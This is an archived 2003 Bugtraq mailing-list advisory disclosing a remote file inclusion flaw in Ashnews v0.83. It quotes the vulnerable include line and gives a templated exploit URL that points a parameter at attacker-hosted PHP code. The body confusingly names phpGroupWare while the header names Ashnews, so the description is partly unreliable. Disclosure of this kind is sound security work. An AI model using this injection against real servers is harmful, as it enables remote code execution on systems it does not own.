[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030722150529.6557.qmail@www.securityfocus.com>
Date: 22 Jul 2003 15:05:29 -0000
From: phil dunn <z3hp@...oo.com>
To: bugtraq@...urityfocus.com
Subject: sorry, wrong file
######################################################
## Name: Phil Dunn ##
## Email: z3hp@...oo.com ##
## Date: July - 20 - 2003 ##
## Program: Ashnews v0.83 ##
## Version: v0.83 ##
##Vendor Name: AshWebStudio ##
## Vendor URL: http://projects.ashwebstudio.com/ ##
######################################################
An include file vulnerability was found in phpGroupWare. This exploit
works for all Branches. A remote
user can create arbitrary PHP code and locate it on a remote server. Then,
the remote user can issue a
specially crafted URL to the target server that specifies the remote PHP
code for inclusion.
ashnews.php & ashheadlines.php @ line 14
-----------------------------------------------
include($pathtoashnews."ashprojects/newsconfig.php");
-----------------------------------------------
Exploit:
http://[server]/[ashweb dir]/ashnews.php?pathtoashnews=[remote location]
Powered by blists - more mailing lists